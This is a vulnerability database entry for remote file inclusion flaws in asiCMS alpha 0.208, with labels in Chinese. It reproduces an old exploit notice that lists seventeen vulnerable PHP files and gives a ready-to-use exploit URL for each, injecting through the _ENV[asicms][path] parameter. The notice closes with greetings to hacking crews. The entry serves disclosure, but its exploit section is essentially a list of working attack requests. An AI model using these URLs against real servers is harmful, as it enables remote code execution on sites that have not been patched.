asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities

基本字段

漏洞编号：: SSV-9689

披露/发现时间：: 未知

提交时间：: 2008-10-07

漏洞等级：

漏洞类别：: 远程文件包含

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

=========================================================================================== [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability Software : asiCMS version alpha 0.208 Vendor : http://asicms.sourceforge.net/ Download : http://sourceforge.net/project/showfiles.php?group_id=203457 Author : NoGe Contact : noge[dot]code[at]gmail[dot]com =========================================================================================== [o] Vulnerable file classes/Auth/OpenID/Association.php classes/Auth/OpenID/BigMath.php classes/Auth/OpenID/DiffieHellman.php classes/Auth/OpenID/DumbStore.php classes/Auth/OpenID/Extension.php classes/Auth/OpenID/FileStore.php classes/Auth/OpenID/HMAC.php classes/Auth/OpenID/MemcachedStore.php classes/Auth/OpenID/Message.php classes/Auth/OpenID/Nonce.php classes/Auth/OpenID/SQLStore.php classes/Auth/OpenID/SReg.php classes/Auth/OpenID/TrustRoot.php classes/Auth/OpenID/URINorm.php classes/Auth/Yadis/XRDS.php classes/Auth/Yadis/XRI.php classes/Auth/Yadis/XRIRes.php All the file is affected by _ENV[asicms][path] variable [o] Exploit http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]= http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]= =========================================================================================== [o] Greetz MainHack BrotherHood [ www.mainhack.com ] VOP Crew [ Vaksin13 OoN_BoY Paman ] H312Y yooogy mousekill }^-^{ k1tk4t skulmatic olibekas ulga Cungkee str0ke ===========================================================================================

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

发现/披露了漏洞
2008-10-07 提交了漏洞
2008-10-07 提交更新了 PoC

asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定